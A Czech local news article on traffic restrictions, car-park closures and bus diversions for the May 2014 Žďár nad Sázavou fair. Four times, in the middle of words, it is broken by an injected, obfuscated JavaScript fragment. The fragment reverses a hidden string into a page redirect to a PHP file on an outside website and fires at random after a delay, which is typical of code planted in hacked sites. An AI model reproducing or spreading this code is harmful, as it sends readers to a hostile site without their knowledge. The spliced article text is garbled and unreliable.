most, Klafar, pouť
Rainbow page separator

Žďárská pouť omezí dopravu ve městě

Středa, 7. května 2014

Most Klafar

Žďár nad Sázavou / Od 12. do 19. května budou kvůli žďárské pouti uzavřena parkoviště u Sportbaru a vedle nové komunikace vedoucí na Klafar v ulici Libušínská. Žďárská radnice pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to žádá obyvatele, kteří tam parkují, aby svá auta v té době postavili jinam. Kupříkladu k Domu kultury nebo na centrální parkoviště.
V souvislosti s poutí se rovněž zastaví mo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torová doprava přes most na Klafar, který se stane průchozí pouze pro chodce. Hlavními pouťovými dny budou sobota 17. a neděle 18. května, ale provozovatelé atrakcí začnou najíždět už začátkem týdne. Vozovku přehradí atrakce a dál směrem ke Klafaru bude možné odstavit auta. Pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože vedení města nechce omezovat rozsah poutě, s ohledem na bezpečnost omezí dopravu. „Musíme myslet především na zvýšený pohyb dětí v lokalitě,“ sdělila žďárská starostka Dagmar Zvěřinová.
V pouťovém týdnu bude rovněž zapovězen vjezd nákladním autům do ulice Šípková a do částí ulic Libušínská a Studentská. Od 11. do 19. května dojde k odklonu au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusů MHD jedoucích ulicí Libušínská do ulice Dolní – zastávka MHD Libušínská bude zrušena. Jako náhradní pro linky číslo 4A, 4B a 4C bude možno využít zastávky Wonkova nebo Žižkova, pro spoje 1, 7, 9, 11 a 21, 25, 29 linky číslo 5 zase zastávku Havlíčkovo náměstí.